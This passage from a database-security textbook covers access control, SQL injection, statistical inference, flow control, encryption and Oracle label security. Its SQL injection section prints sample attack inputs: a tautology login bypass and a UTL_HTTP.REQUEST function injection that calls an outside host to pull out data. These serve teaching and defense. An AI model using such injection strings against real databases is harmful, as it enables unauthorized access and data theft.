reflects the sensitivity of the row as per the policy. Similar to MAC, where each user
has a security clearance, each user has an identity in label-based security. This user’s
identity is compared to the label assigned to each row to determine whether the user
has access to view the contents of that row. However, the user can write the label
value himself, within certain restrictions and guidelines for that specific row. This
label can be set to a value that is between the user’s current session label and the
user’s minimum level. The DBA has the privilege to set an initial default row label.

The Label Security requirements are applied on top of the DAC requirements for
each user. Hence, the user must satisfy the DAC requirements and then the label
security requirements to access a row. The DAC requirements make sure that the
user is legally authorized to carry on that operation on the schema. In most applica-
tions, only some of the tables need label-based security. For the majority of the
application tables, the protection provided by DAC is sufficient.

Security policies are generally created by managers and human resources personnel.
The policies are high-level, technology neutral, and relate to risks. Policies are a
result of management instructions to specify organizational procedures, guiding
principles, and courses of action that are considered to be expedient, prudent, or
advantageous. Policies are typically accompanied by a definition of penalties and
countermeasures if the policy is transgressed. These policies are then interpreted
and converted to a set of label-oriented policies by the Label Security administra-
tor, who defines the security labels for data and authorizations for users; these labels
and authorizations govern access to specified protected objects.

Suppose a user has SELECT privileges on a table. When the user executes a SELECT
statement on that table, Label Security will automatically evaluate each row
returned by the query to determine whether the user has rights to view the data. For
example, if the user has a sensitivity of 20, then the user can view all rows having a
security level of 20 or lower. The level determines the sensitivity of the information
contained in a row; the more sensitive the row, the higher its security label value.
Such Label Security can be configured to perform security checks on UPDATE,
DELETE, and INSERT statements as well.

3.4 XML Access Control
With the worldwide use of XML in commercial and scientific applications, efforts
are under way to develop security standards. Among these efforts are digital

854

Database Security

signatures and encryption standards for XML. The XML Signature Syntax and
Processing specification describes an XML syntax for representing the associations
between cryptographic signatures and XML documents or other electronic
resources. The specification also includes procedures for computing and verifying
XML signatures. An XML digital signature differs from other protocols for message
signing, such as PGP (Pretty Good Privacy—a confidentiality and authentication
service that can be used for electronic mail and file storage application), in its sup-
port for signing only specific portions of the XML tree rather than the complete
document. Additionally, the XML signature specification defines mechanisms for
countersigning and transformations—so-called canonicalization to ensure that two
instances of the same text produce the same digest for signing even if their represen-
tations differ slightly, for example, in typographic white space.

The XML Encryption Syntax and Processing specification defines XML vocabulary
and processing rules for protecting confidentiality of XML documents in whole or
in part and of non-XML data as well. The encrypted content and additional pro-
cessing information for the recipient are represented in well-formed XML so that
the result can be further processed using XML tools. In contrast to other commonly
used technologies for confidentiality such as SSL (Secure Sockets Layer—a leading
Internet security protocol), and virtual private networks, XML encryption also
applies to parts of documents and to documents in persistent storage.

3.5 Access Control Policies for E-Commerce and the Web
Electronic commerce (e-commerce) environments are characterized by any trans-
actions that are done electronically. They require elaborate access control policies
that go beyond traditional DBMSs. In conventional database environments, access
control is usually performed using a set of authorizations stated by security officers
or users according to some security policies. Such a simple paradigm is not
well suited for a dynamic environment like e-commerce. Furthermore, in an
e-commerce environment the resources to be protected are not only traditional data
but also knowledge and experience. Such peculiarities call for more flexibility in
specifying access control policies. The access control mechanism must be flexible
enough to support a wide spectrum of heterogeneous protection objects.

A second related requirement is the support for content-based access control.
Content-based access control allows one to express access control policies that take
the protection object content into account. In order to support content-based access
control, access control policies must allow inclusion of conditions based on the
object content.

A third requirement is related to the heterogeneity of subjects, which requires access
control policies based on user characteristics and qualifications rather than on spe-
cific and individual characteristics (for example, user IDs). A possible solution, to
better take into account user profiles in the formulation of access control policies, is
to support the notion of credentials. A credential is a set of properties concerning a
user that are relevant for security purposes (for example, age or position or role

855

Database Security

within an organization). For instance, by using credentials, one can simply formu-
late policies such as Only permanent staff with five or more years of service can access
documents related to the internals of the system.

It is believed that the XML is expected to play a key role in access control for
e-commerce applications5 because XML is becoming the common representation
language for document interchange over the Web, and is also becoming the lan-
guage for e-commerce. Thus, on the one hand there is the need to make XML repre-
sentations secure, by providing access control mechanisms specifically tailored to
the protection of XML documents. On the other hand, access control information
(that is, access control policies and user credentials) can be expressed using XML
itself. The Directory Services Markup Language (DSML) is a representation of
directory service information in XML syntax. It provides a foundation for a stan-
dard for communicating with the directory services that will be responsible for pro-
viding and authenticating user credentials. The uniform presentation of both
protection objects and access control policies can be applied to policies and creden-
tials themselves. For instance, some credential properties (such as the user name)
may be accessible to everyone, whereas other properties may be visible only to a
restricted class of users. Additionally, the use of an XML-based language for specify-
ing credentials and access control policies facilitates secure credential submission
and export of access control policies.

4 SQL Injection
SQL Injection is one of the most common threats to a database system. We will dis-
cuss it in detail later in this section. Some of the other attacks on databases that are
quite frequent are:

■ Unauthorized privilege escalation. This attack is characterized by an indi-
vidual attempting to elevate his or her privilege by attacking vulnerable
points in the database systems.

■ Privilege abuse. While the previous attack is done by an unauthorized user,
this attack is performed by a privileged user. For example, an administrator
who is allowed to change student information can use this privilege to
update student grades without the instructor’s permission.

■ Denial of service. A Denial of Service (DOS) attack is an attempt to make
resources unavailable to its intended users. It is a general attack category in
which access to network applications or data is denied to intended users by
overflowing the buffer or consuming resources.

■ Weak Authentication. If the user authentication scheme is weak, an attacker
can impersonate the identity of a legitimate user by obtaining their login
credentials.

5See Thuraisingham et al. (2001).

856

Database Security

4.1 SQL Injection Methods
Web programs and applications that access a database can send commands and data
to the database, as well as display data retrieved from the database through the Web
browser. In an SQL Injection attack, the attacker injects a string input through the
application, which changes or manipulates the SQL statement to the attacker’s
advantage. An SQL Injection attack can harm the database in various ways, such as
unauthorized manipulation of the database, or retrieval of sensitive data. It can also
be used to execute system level commands that may cause the system to deny serv-
ice to the application. This section describes types of injection attacks.

SQL Manipulation. A manipulation attack, which is the most common type of
injection attack, changes an SQL command in the application—for example, by
adding conditions to the WHERE-clause of a query, or by expanding a query with
additional query components using set operations such as UNION, INTERSECT, or
MINUS. Other types of manipulation attacks are also possible. A typical manipula-
tion attack occurs during database login. For example, suppose that a simplistic
authentication procedure issues the following query and checks to see if any rows
were returned:

SELECT * FROM users WHERE username = ‘jake’ and PASSWORD =
‘jakespasswd’.

The attacker can try to change (or manipulate) the SQL statement, by changing it as
follows:

SELECT * FROM users WHERE username = ‘jake’ and (PASSWORD =
‘jakespasswd’ or ‘x’ = ‘x’)

As a result, the attacker who knows that ‘jake’ is a valid login of some user is able to
log into the database system as ‘jake’ without knowing his password and is able to do
everything that ‘jake’ may be authorized to do to the database system.

Code Injection. This type of attack attempts to add additional SQL statements or
commands to the existing SQL statement by exploiting a computer bug, which is
caused by processing invalid data. The attacker can inject or introduce code into a
computer program to change the course of execution. Code injection is a popular
technique for system hacking or cracking to gain information.

Function Call Injection. In this kind of attack, a database function or operating
system function call is inserted into a vulnerable SQL statement to manipulate the
data or make a privileged system call. For example, it is possible to exploit a function
that performs some aspect related to network communication. In addition, func-
tions that are contained in a customized database package, or any custom database
function, can be executed as part of an SQL query. In particular, dynamically cre-
ated SQL queries can be exploited since they are constructed at run time.

857

Database Security

For example, the dual table is used in the FROM clause of SQL in Oracle when a user
needs to run SQL that does not logically have a table name. To get today’s date, we
can use:

SELECT SYSDATE FROM dual;

The following example demonstrates that even the simplest SQL statements can be
vulnerable.

SELECT TRANSLATE (‘user input’, ‘from_string’, ‘to_string’) FROM dual;

Here, TRANSLATE is used to replace a string of characters with another string of
characters. The TRANSLATE function above will replace the characters of the
‘from_string’ with the characters in the ‘to_string’ one by one. This means that the f
will be replaced with the t, the r with the o, the o with the _, and so on.

This type of SQL statement can be subjected to a function injection attack. Consider
the following example:

SELECT TRANSLATE (“ || UTL_HTTP.REQUEST (‘http://129.107.2.1/’) || ’’,
‘98765432’, ‘9876’) FROM dual;

The user can input the string (“ || UTL_HTTP.REQUEST (‘http://129.107.2.1/’)
|| ’’), where || is the concatenate operator, thus requesting a page from a Web server.
UTL_HTTP makes Hypertext Transfer Protocol (HTTP) callouts from SQL. The
REQUEST object takes a URL (‘http://129.107.2.1/’ in this example) as a parameter,
contacts that site, and returns the data (typically HTML) obtained from that site.
The attacker could manipulate the string he inputs, as well as the URL, to include
other functions and do other illegal operations. We just used a dummy example to
show conversion of ‘98765432’ to ‘9876’, but the user’s intent would be to access the
URL and get sensitive information. The attacker can then retrieve useful informa-
tion from the database server—located at the URL that is passed as a parameter—
and send it to the Web server (that calls the TRANSLATE function).

4.2 Risks Associated with SQL Injection
SQL injection is harmful and the risks associated with it provide motivation for
attackers. Some of the risks associated with SQL injection attacks are explained
below.

■ Database Fingerprinting. The attacker can determine the type of database
being used in the backend so that he can use database-specific attacks that
correspond to weaknesses in a particular DBMS.

■ Denial of Service. The attacker can flood the server with requests, thus
denying service to valid users, or they can delete some data.

■ Bypassing Authentication. This is one of the most common risks, in which
the attacker can gain access to the database as an authorized user and per-
form all the desired tasks.

858

Database Security

■ Identifying Injectable Parameters. In this type of attack, the attacker gath-
ers important information about the type and structure of the back-end
database of a Web application. This attack is made possible by the fact
that the default error page returned by application servers is often overly
descriptive.

■ Executing Remote Commands. This provides attackers with a tool to exe-
cute arbitrary commands on the database. For example, a remote user can
execute stored database procedures and functions from a remote SQL inter-
active interface.

■ Performing Privilege Escalation. This type of attack takes advantage of log-
ical flaws within the database to upgrade the access level.

4.3 Protection Techniques against SQL Injection
Protection against SQL injection attacks can be achieved by applying certain pro-
gramming rules to all Web-accessible procedures and functions. This section
describes some of these techniques.

Bind Variables (Using Parameterized Statements). The use of bind variables
(also known as parameters) protects against injection attacks and also improves per-
formance.

Consider the following example using Java and JDBC:

PreparedStatement stmt = conn.prepareStatement( “SELECT * FROM
EMPLOYEE WHERE EMPLOYEE_ID=? AND PASSWORD=?”);

stmt.setString(1, employee_id);

stmt.setString(2, password);

Instead of embedding the user input into the statement, the input should be bound
to a parameter. In this example, the input ‘1’ is assigned (bound) to a bind variable
‘employee_id’ and input ‘2’ to the bind variable ‘password’ instead of directly pass-
ing string parameters.

Filtering Input (Input Validation). This technique can be used to remove escape
characters from input strings by using the SQL Replace function. For example, the
delimiter single quote (‘) can be replaced by two single quotes (‘’). Some SQL
Manipulation attacks can be prevented by using this technique, since escape charac-
ters can be used to inject manipulation attacks. However, because there can be a
large number of escape characters, this technique is not reliable.

Function Security. Database functions, both standard and custom, should be
restricted, as they can be exploited in the SQL function injection attacks.

859

Database Security

5 Introduction to Statistical Database Security
Statistical databases are used mainly to produce statistics about various popula-
tions. The database may contain confidential data about individuals, which should
be protected from user access. However, users are permitted to retrieve statistical
information about the populations, such as averages, sums, counts, maximums,
minimums, and standard deviations. The techniques that have been developed to
protect the privacy of individual information are beyond the scope of this text. We
will illustrate the problem with a very simple example, which refers to the relation
shown in Figure 3. This is a PERSON relation with the attributes Name, Ssn, Income,
Address, City, State, Zip, Sex, and Last_degree.

A population is a set of tuples of a relation (table) that satisfy some selection condi-
tion. Hence, each selection condition on the PERSON relation will specify a partic-
ular population of PERSON tuples. For example, the condition Sex = ‘M’ specifies
the male population; the condition ((Sex = ‘F’) AND (Last_degree = ‘M.S.’ OR
Last_degree = ‘Ph.D.’)) specifies the female population that has an M.S. or Ph.D.
degree as their highest degree; and the condition City = ‘Houston’ specifies the pop-
ulation that lives in Houston.

Statistical queries involve applying statistical functions to a population of tuples.
For example, we may want to retrieve the number of individuals in a population or
the average income in the population. However, statistical users are not allowed to
retrieve individual data, such as the income of a specific person. Statistical database
security techniques must prohibit the retrieval of individual data. This can be
achieved by prohibiting queries that retrieve attribute values and by allowing only
queries that involve statistical aggregate functions such as COUNT, SUM, MIN, MAX,
AVERAGE, and STANDARD DEVIATION. Such queries are sometimes called statistical
queries.

It is the responsibility of a database management system to ensure the confidential-
ity of information about individuals, while still providing useful statistical sum-
maries of data about those individuals to users. Provision of privacy protection of
users in a statistical database is paramount; its violation is illustrated in the follow-
ing example.

In some cases it is possible to infer the values of individual tuples from a sequence
of statistical queries. This is particularly true when the conditions result in a

Name Ssn Income Address City State Zip Sex Last_degree

PERSON Figure 3
The PERSON relation
schema for illustrating
statistical database
security.

860

Database Security

population consisting of a small number of tuples. As an illustration, consider the
following statistical queries:

Q1: SELECT COUNT (*) FROM PERSON
WHERE ;

Q2: SELECT AVG (Income) FROM PERSON
WHERE ;

Now suppose that we are interested in finding the Salary of Jane Smith, and we know
that she has a Ph.D. degree and that she lives in the city of Bellaire, Texas. We issue
the statistical query Q1 with the following condition:

(Last_degree=‘Ph.D.’ AND Sex=‘F’ AND City=‘Bellaire’ AND State=‘Texas’)

If we get a result of 1 for this query, we can issue Q2 with the same condition and
find the Salary of Jane Smith. Even if the result of Q1 on the preceding condition is
not 1 but is a small number—say 2 or 3—we can issue statistical queries using the
functions MAX, MIN, and AVERAGE to identify the possible range of values for the
Salary of Jane Smith.

The possibility of inferring individual information from statistical queries is
reduced if no statistical queries are permitted whenever the number of tuples in the
population specified by the selection condition falls below some threshold. Another
technique for prohibiting retrieval of individual information is to prohibit
sequences of queries that refer repeatedly to the same population of tuples. It is also
possible to introduce slight inaccuracies or noise into the results of statistical queries
deliberately, to make it difficult to deduce individual information from the results.
Another technique is partitioning of the database. Partitioning implies that records
are stored in groups of some minimum size; queries can refer to any complete group
or set of groups, but never to subsets of records within a group. The interested
reader is referred to the bibliography at the end of this chapter for a discussion of
these techniques.

6 Introduction to Flow Control
Flow control regulates the distribution or flow of information among accessible
objects. A flow between object X and object Y occurs when a program reads values
from X and writes values into Y. Flow controls check that information contained in
some objects does not flow explicitly or implicitly into less protected objects. Thus, a
user cannot get indirectly in Y what he or she cannot get directly in X. Active flow
control began in the early 1970s. Most flow controls employ some concept of security
class; the transfer of information from a sender to a receiver is allowed only if the
receiver’s security class is at least as privileged as the sender’s. Examples of a flow con-
trol include preventing a service program from leaking a customer’s confidential
data, and blocking the transmission of secret military data to an unknown classified
user.

A flow policy specifies the channels along which information is allowed to move.
The simplest flow policy specifies just two classes of information—confidential (C)

861

Database Security

and nonconfidential (N)—and allows all flows except those from class C to class N.
This policy can solve the confinement problem that arises when a service program
handles data such as customer information, some of which may be confidential.
For example, an income-tax computing service might be allowed to retain a cus-
tomer’s address and the bill for services rendered, but not a customer’s income or
deductions.

Access control mechanisms are responsible for checking users’ authorizations for
resource access: Only granted operations are executed. Flow controls can be
enforced by an extended access control mechanism, which involves assigning a secu-
rity class (usually called the clearance) to each running program. The program is
allowed to read a particular memory segment only if its security class is as high as
that of the segment. It is allowed to write in a segment only if its class is as low as
that of the segment. This automatically ensures that no information transmitted by
the person can move from a higher to a lower class. For example, a military program
with a secret clearance can only read from objects that are unclassified and confi-
dential and can only write into objects that are secret or top secret.

Two types of flow can be distinguished: explicit flows, occurring as a consequence of
assignment instructions, such as Y:= f(X1,Xn,), and implicit flows generated by con-
ditional instructions, such as if f(Xm+1, …, Xn) then Y:= f (X1,Xm).

Flow control mechanisms must verify that only authorized flows, both explicit and
implicit, are executed. A set of rules must be satisfied to ensure secure information
flows. Rules can be expressed using flow relations among classes and assigned to
information, stating the authorized flows within a system. (An information flow
from A to B occurs when information associated with A affects the value of infor-
mation associated with B. The flow results from operations that cause information
transfer from one object to another.) These relations can define, for a class, the set of
classes where information (classified in that class) can flow, or can state the specific
relations to be verified between two classes to allow information to flow from one to
the other. In general, flow control mechanisms implement the controls by assigning
a label to each object and by specifying the security class of the object. Labels are
then used to verify the flow relations defined in the model.

6.1 Covert Channels
A covert channel allows a transfer of information that violates the security or the
policy. Specifically, a covert channel allows information to pass from a higher clas-
sification level to a lower classification level through improper means. Covert chan-
nels can be classified into two broad categories: timing channels and storage. The
distinguishing feature between the two is that in a timing channel the information
is conveyed by the timing of events or processes, whereas storage channels do not
require any temporal synchronization, in that information is conveyed by accessing
system information or what is otherwise inaccessible to the user.

In a simple example of a covert channel, consider a distributed database system in
which two nodes have user security levels of secret (S) and unclassified (U). In order

862

Database Security

for a transaction to commit, both nodes must agree to commit. They mutually can
only do operations that are consistent with the *-property, which states that in any
transaction, the S site cannot write or pass information to the U site. However, if
these two sites collude to set up a covert channel between them, a transaction
involving secret data may be committed unconditionally by the U site, but the S site
may do so in some predefined agreed-upon way so that certain information may be
passed from the S site to the U site, violating the *-property. This may be achieved
where the transaction runs repeatedly, but the actions taken by the S site implicitly
convey information to the U site. Measures such as locking prevent concurrent
writing of the information by users with different security levels into the same
objects, preventing the storage-type covert channels. Operating systems and distrib-
uted databases provide control over the multiprogramming of operations that
allows a sharing of resources without the possibility of encroachment of one pro-
gram or process into another’s memory or other resources in the system, thus pre-
venting timing-oriented covert channels. In general, covert channels are not a major
problem in well-implemented robust database implementations. However, certain
schemes may be contrived by clever users that implicitly transfer information.

Some security experts believe that one way to avoid covert channels is to disallow
programmers to actually gain access to sensitive data that a program will process
after the program has been put into operation. For example, a programmer for a
bank has no need to access the names or balances in depositors’ accounts.
Programmers for brokerage firms do not need to know what buy and sell orders
exist for clients. During program testing, access to a form of real data or some sam-
ple test data may be justifiable, but not after the program has been accepted for reg-
ular use.

7 Encryption and Public
Key Infrastructures

The previous methods of access and flow control, despite being strong control
measures, may not be able to protect databases from some threats. Suppose we com-
municate data, but our data falls into the hands of a nonlegitimate user. In this situ-
ation, by using encryption we can disguise the message so that even if the
transmission is diverted, the message will not be revealed. Encryption is the conver-
sion of data into a form, called a ciphertext, which cannot be easily understood by
unauthorized persons. It enhances security and privacy when access controls are
bypassed, because in cases of data loss or theft, encrypted data cannot be easily
understood by unauthorized persons.

With this background, we adhere to following standard definitions:6

■ Ciphertext: Encrypted (enciphered) data.

6These definitions are from NIST (National Institute of Standards and Technology) from http://csrc.nist
.gov/publications/nistpubs/800-67/SP800-67.pdf.

863

Database Security

■ Plaintext (or cleartext): Intelligible data that has meaning and can be read or
acted upon without the application of decryption.

■ Encryption: The process of transforming plaintext into ciphertext.

■ Decryption: The process of transforming ciphertext back into plaintext.

Encryption consists of applying an encryption algorithm to data using some pre-
specified encryption key. The resulting data has to be decrypted using a
decryption key to recover the original data.

7.1 The Data Encryption and Advanced
Encryption Standards

The Data Encryption Standard (DES) is a system developed by the U.S. govern-
ment for use by the general public. It has been widely accepted as a cryptographic
standard both in the United States and abroad. DES can provide end-to-end
encryption on the channel between sender A and receiver B. The DES algorithm is a
careful and complex combination of two of the fundamental building blocks of
encryption: substitution and permutation (transposition). The algorithm derives its
strength from repeated application of these two techniques for a total of 16 cycles.
Plaintext (the original form of the message) is encrypted as blocks of 64 bits.
Although the key is 64 bits long, in effect the key can be any 56-bit number. After
questioning the adequacy of DES, the NIST introduced the Advanced Encryption
Standard (AES). This algorithm has a block size of 128 bits, compared with DES’s
56-block size, and can use keys of 128, 192, or 256 bits, compared with DES’s 56-bit
key. AES introduces more possible keys, compared with DES, and thus takes a much
longer time to crack.

7.2 Symmetric Key Algorithms
A symmetric key is one key that is used for both encryption and decryption. By
using a symmetric key, fast encryption and decryption is possible for routine use
with sensitive data in the database. A message encrypted with a secret key can be
decrypted only with the same secret key. Algorithms used for symmetric
key encryption are called secret-key algorithms. Since secret-key algorithms are
mostly used for encrypting the content of a message, they are also called content-
encryption algorithms.

The major liability associated with secret-key algorithms is the need for sharing the
secret key. A possible method is to derive the secret key from a user-supplied password
string by applying the same function to the string at both the sender and receiver; this
is known as a password-based encryption algorithm. The strength of the symmetric key
encryption depends on the size of the key used. For the same algorithm, encrypting
using a longer key is tougher to break than the one using a shorter key.

7.3 Public (Asymmetric) Key Encryption
In 1976, Diffie and Hellman proposed a new kind of cryptosystem, which they
called public key encryption. Public key algorithms are based on mathematical

864

Database Security

functions rather than operations on bit patterns. They address one drawback of
symmetric key encryption, namely that both sender and recipient must exchange
the common key in a secure manner. In public key systems, two keys are used for
encryption/decryption. The public key can be transmitted in a non-secure way,
whereas the private key is not transmitted at all. These algorithms—which use two
related keys, a public key and a private key, to perform complementary operations
(encryption and decryption)—are known as asymmetric key encryption algo-
rithms. The use of two keys can have profound consequences in the areas of confi-
dentiality, key distribution, and authentication. The two keys used for public key
encryption are referred to as the public key and the private key. The private key is
kept secret, but it is referred to as a private key rather than a secret key (the key used
in conventional encryption) to avoid confusion with conventional encryption. The
two keys are mathematically related, since one of the keys is used to perform
encryption and the other to perform decryption. However, it is very difficult to
derive the private key from the public key.

A public key encryption scheme, or infrastructure, has six ingredients:

1. Plaintext. This is the data or readable message that is fed into the algorithm
as input.

2. Encryption algorithm. This algorithm performs various transformations
on the plaintext.

3. and 4. Public and private keys. These are a pair of keys that have been
selected so that if one is used for encryption, the other is used for decryp-
tion. The exact transformations performed by the encryption algorithm
depend on the public or private key that is provided as input. For example, if
a message is encrypted using the public key, it can only be decrypted using
the private key.

5. Ciphertext. This is the scrambled message produced as output. It depends
on the plaintext and the key. For a given message, two different keys will pro-
duce two different ciphertexts.

6. Decryption algorithm. This algorithm accepts the ciphertext and the
matching key and produces the original plaintext.

As the name suggests, the public key of the pair is made public for others to use,
whereas the private key is known only to its owner. A general-purpose public key
cryptographic algorithm relies on one key for encryption and a different but related
key for decryption. The essential steps are as follows:

1. Each user generates a pair of keys to be used for the encryption and decryp-
tion of messages.

2. Each user places one of the two keys in a public register or other accessible
file. This is the public key. The companion key is kept private.

3. If a sender wishes to send a private message to a receiver, the sender encrypts
the message using the receiver’s public key.

865

Database Security

4. When the receiver receives the message, he or she decrypts it using the
receiver’s private key. No other recipient can decrypt the message because
only the receiver knows his or her private key.

The RSA Public Key Encryption Algorithm. One of the first public key schemes
was introduced in 1978 by Ron Rivest, Adi Shamir, and Len Adleman at MIT and is
named after them as the RSA scheme. The RSA scheme has since then reigned
supreme as the most widely accepted and implemented approach to public key
encryption. The RSA encryption algorithm incorporates results from number the-
ory, combined with the difficulty of determining the prime factors of a target. The
RSA algorithm also operates with modular arithmetic—mod n.

Two keys, d and e, are used for decryption and encryption. An important property is
that they can be interchanged. n is chosen as a large integer that is a product of two
large distinct prime numbers, a and b, n = a × b. The encryption key e is a randomly
chosen number between 1 and n that is relatively prime to (a – 1) × (b – 1). The
plaintext block P is encrypted as Pe where Pe = P mod n. Because the exponentiation
is performed mod n, factoring Pe to uncover the encrypted plaintext is difficult.
However, the decrypting key d is carefully chosen so that (Pe)d mod n = P. The
decryption key d can be computed from the condition that d × e = 1 mod ((a – 1) ×
(b – 1)). Thus, the legitimate receiver who knows d simply computes (Pe)d mod n =
P and recovers P without having to factor Pe.

7.4 Digital Signatures
A digital signature is an example of using encryption techniques to provide authen-
tication services in electronic commerce applications. Like a handwritten signature,
a digital signature is a means of associating a mark unique to an individual with a
body of text. The mark should be unforgettable, meaning that others should be able
to check that the signature comes from the originator.

A digital signature consists of a string of symbols. If a person’s digital signature were
always the same for each message, then one could easily counterfeit it by simply
copying the string of symbols. Thus, signatures must be different for each use. This
can be achieved by making each digital signature a function of the message that it is
signing, together with a timestamp. To be unique to each signer and counterfeit-
proof, each digital signature must also depend on some secret number that is
unique to the signer. Thus, in general, a counterfeitproof digital signature must
depend on the message and a unique secret number of the signer. The verifier of the
signature, however, should not need to know any secret number. Public key tech-
niques are the best means of creating digital signatures with these properties.

7.5 Digital Certificates
A digital certificate is used to combine the value of a public key with the identity of
the person or service that holds the corresponding private key into a digitally signed

866

Database Security

statement. Certificates are issued and signed by a certification authority (CA). The
entity receiving this certificate from a CA is the subject of that certificate. Instead of
requiring each participant in an application to authenticate every user, third-party
authentication relies on the use of digital certificates.

The digital certificate itself contains various types of information. For example,
both the certification authority and the certificate owner information are included.
The following list describes all the information included in the certificate:

1. The certificate owner information, which is represented by a unique identi-
fier known as the distinguished name (DN) of the owner. This includes the
owner’s name, as well as the owner’s organization and other information
about the owner.

2. The certificate also includes the public key of the owner.

3. The date of issue of the certificate is also included.

4. The validity period is specified by ‘Valid From’ and ‘Valid To’ dates, which are
included in each certificate.

5. Issuer identifier information is included in the certificate.

6. Finally, the digital signature of the issuing CA for the certificate is included.
All the information listed is encoded through a message-digest function,
which creates the digital signature. The digital signature basically certifies
that the association between the certificate owner and public key is valid.

8 Privacy Issues and Preservation
Preserving data privacy is a growing challenge for database security and privacy
experts. In some perspectives, to preserve data privacy we should even limit per-
forming large-scale data mining and analysis. The most commonly used techniques
to address this concern are to avoid building mammoth central warehouses as a sin-
gle repository of vital information. Another possible measure is to intentionally
modify or perturb data.

If all data were available at a single warehouse, violating only a single repository’s
security could expose all data. Avoiding central warehouses and using distributed
data mining algorithms minimizes the exchange of data needed to develop globally
valid models. By modifying, perturbing, and anonymizing data, we can also miti-
gate privacy risks associated with data mining. This can be done by removing iden-
tity information from the released data and injecting noise into the data. However,
by using these techniques, we should pay attention to the quality of the resulting
data in the database, which may undergo too many modifications. We must be able
to estimate the errors that may be introduced by these modifications.

Privacy is an important area of ongoing research in database management. It is
complicated due to its multidisciplinary nature and the issues related to the subjec-
tivity in the interpretation of privacy, trust, and so on. As an example, consider
medical and legal records and transactions, which must maintain certain privacy

867

Database Security

requirements while they are being defined and enforced. Providing access control
and privacy for mobile devices is also receiving increased attention. DBMSs need
robust techniques for efficient storage of security-relevant information on small
devices, as well as trust negotiation techniques. Where to keep information related
to user identities, profiles, credentials, and permissions and how to use it for reliable
user identification remains an important problem. Because large-sized streams of
data are generated in such environments, efficient techniques for access control
must be devised and integrated with processing techniques for continuous queries.
Finally, the privacy of user location data, acquired from sensors and communica-
tion networks, must be ensured.

9 Challenges of Database Security
Considering the vast growth in volume and speed of threats to databases and infor-
mation assets, research efforts need to be devoted to the following issues: data qual-
ity, intellectual property rights, and database survivability. These are only some of
the main challenges that researchers in database security are trying to address.

9.1 Data Quality
The database community needs techniques and organizational solutions to assess
and attest the quality of data. These techniques may include simple mechanisms
such as quality stamps that are posted on Web sites. We also need techniques that
provide more effective integrity semantics verification and tools for the assessment
of data quality, based on techniques such as record linkage. Application-level recov-
ery techniques are also needed for automatically repairing incorrect data. The ETL
(extract, transform, load) tools widely used to load data in data warehouses are
presently grappling with these issues.

9.2 Intellectual Property Rights
With the widespread use of the Internet and intranets, legal and informational
aspects of data are becoming major concerns of organizations. To address these
concerns, watermarking techniques for relational data have been proposed. The
main purpose of digital watermarking is to protect content from unauthorized
duplication and distribution by enabling provable ownership of the content. It has
traditionally relied upon the availability of a large noise domain within which the
object can be altered while retaining its essential properties. However, research is
needed to assess the robustness of such techniques and to investigate different
approaches aimed at preventing intellectual property rights violations.

9.3 Database Survivability
Database systems need to operate and continue their functions, even with reduced
capabilities, despite disruptive events such as information warfare attacks. A DBMS,

868

Database Security

in addition to making every effort to prevent an attack and detecting one in the
event of occurrence, should be able to do the following:

■ Confinement. Take immediate action to eliminate the attacker’s access to the
system and to isolate or contain the problem to prevent further spread.

■ Damage assessment. Determine the extent of the problem, including failed
functions and corrupted data.

■ Reconfiguration. Reconfigure to allow operation to continue in a degraded
mode while recovery proceeds.

■ Repair. Recover corrupted or lost data and repair or reinstall failed system
functions to reestablish a normal level of operation.

■ Fault treatment. To the extent possible, identify the weaknesses exploited in
the attack and take steps to prevent a recurrence.

The goal of the information warfare attacker is to damage the organization’s opera-
tion and fulfillment of its mission through disruption of its information systems.
The specific target of an attack may be the system itself or its data. While attacks that
bring the system down outright are severe and dramatic, they must also be well
timed to achieve the attacker’s goal, since attacks will receive immediate and con-
centrated attention in order to bring the system back to operational condition, diag-
nose how the attack took place, and install preventive measures.

To date, issues related to database survivability have not been sufficiently investi-
gated. Much more research needs to be devoted to techniques and methodologies
that ensure database system survivability.

10 Oracle Label-Based Security
Restricting access to entire tables or isolating sensitive data into separate databases is
a costly operation to administer. Oracle Label Security overcomes the need for such
measures by enabling row-level access control. It is available in Oracle Database 11g
Release 1 (11.1) Enterprise Edition at the time of writing. Each database table or
view has a security policy associated with it. This policy executes every time the
table or view is queried or altered. Developers can readily add label-based access
control to their Oracle Database applications. Label-based security provides an
adaptable way of controlling access to sensitive data. Both users and data have labels
associated with them. Oracle Label Security uses these labels to provide security.

10.1 Virtual Private Database (VPD) Technology
Virtual Private Databases (VPDs) is a feature of the Oracle Enterprise Edition that
adds predicates to user statements to limit their access in a transparent manner to
the user and the application. The VPD concept allows server-enforced, fine-grained
access control for a secure application.

VPD provides access control based on policies. These VPD policies enforce object-
level access control or row-level security. It provides an application programming

869

Database Security

interface (API) that allows security policies to be attached to database tables or
views. Using PL/SQL, a host programming language used in Oracle applications,
developers and security administrators can implement security policies with the
help of stored procedures. VPD policies allow developers to remove access security
mechanisms from applications and centralize them within the Oracle Database.

VPD is enabled by associating a security “policy” with a table, view, or synonym. An
administrator uses the supplied PL/SQL package, DBMS_RLS, to bind a policy
function with a database object. When an object having a security policy associated
with it is accessed, the function implementing this policy is consulted. The policy
function returns a predicate (a WHERE clause) which is then appended to the user’s
SQL statement, thus transparently and dynamically modifying the user’s data access.
Oracle Label Security is a technique of enforcing row-level security in the form of a
security policy.

10.2 Label Security Architecture
Oracle Label Security is built on the VPD technology delivered in the Oracle
Database 11.1 Enterprise Edition. Figure 4 illustrates how data is accessed under
Oracle Label Security, showing the sequence of DAC and label security checks.

Figure 4 shows the sequence of discretionary access control (DAC) and label secu-
rity checks. The left part of the figure shows an application user in an Oracle
Database 11g Release 1 (11.1) session sending out an SQL request. The Oracle
DBMS checks the DAC privileges of the user, making sure that he or she has
SELECT privileges on the table. Then it checks whether the table has a Virtual
Private Database (VPD) policy associated with it to determine if the table is pro-
tected using Oracle Label Security. If it is, the VPD SQL modification (WHERE
clause) is added to the original SQL statement to find the set of accessible rows for
the user to view. Then Oracle Label Security checks the labels on each row, to deter-
mine the subset of rows to which the user has access (as explained in the next sec-
tion). This modified query gets processed, optimized, and executed.

10.3 How Data Labels and User Labels Work Together
A user’s label indicates the information the user is permitted to access. It also deter-
mines the type of access (read or write) that the user has on that information. A
row’s label shows the sensitivity of the information that the row contains as well as
the ownership of the information. When a table in the database has a label-based
access associated with it, a row can be accessed only if the user’s label meet certain
criteria defined in the policy definitions. Access is granted or denied based on the
result of comparing the data label and the session label of the user.

Compartments allow a finer classification of sensitivity of the labeled data. All data
related to the same project can be labeled with the same compartment.
Compartments are optional; a label can contain zero or more compartments.

870

Database Security

Oracle User

Request for Data in SQL

Check DAC
(Discretionary) Access

Control

